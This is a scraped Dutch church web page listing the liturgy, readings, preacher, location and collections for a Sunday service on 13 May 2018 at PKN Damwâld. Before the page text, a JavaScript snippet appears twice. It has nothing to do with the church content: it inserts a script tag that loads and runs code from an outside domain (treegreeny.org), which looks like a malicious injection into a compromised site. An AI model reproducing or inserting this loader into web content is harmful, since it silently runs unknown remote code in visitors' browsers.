;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 13 mei 2018 9:30 uur - PKN Damwâld
zondag 13 mei 2018
09:30 uur

Kerkdienst zondag 13 mei 2018 9:30 uur

Thema: Nooit meer nacht

Informatie

Voorganger:Ds. G. Oberink, Urk
Thema:Nooit meer nacht
Liturgie
Lied voor de dienst ELb 142
Welkom en mededelingen
Introlied : Psalm 21 : 1, 3, 7
Stil gebed - Votum - Groet
Introtekst Handelingen 1 : 7b, 8a
Antwoord ELb 140
Gods eis Micha 6 : 8
Antwoord Gezang 7 : 1
Samenvatting van de Wet Gods Belofte Jesaja 1 : 18-20
Antwoord Gezang 7 : 4
Gebed
Antwoord ELb 140
We lezen: Handelingen 1 : 1-12
Antwoord Gezang 234 : 1
We lezen: Openbaring 21 : 1-5
Antwoord Gezang 329 : 1, 2
We lezen: Openbaring 22 : 1-5
Antwoord Gezang 329 : 3
Verkondiging : Nooit meer nacht .
We zingen: Gezang 295 : 1, 3, 5
Gebeden
Collecte
Slotlied ELb 119
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Diaconie
Tweede collecte: Kerk
Uitganscollecte: Kerk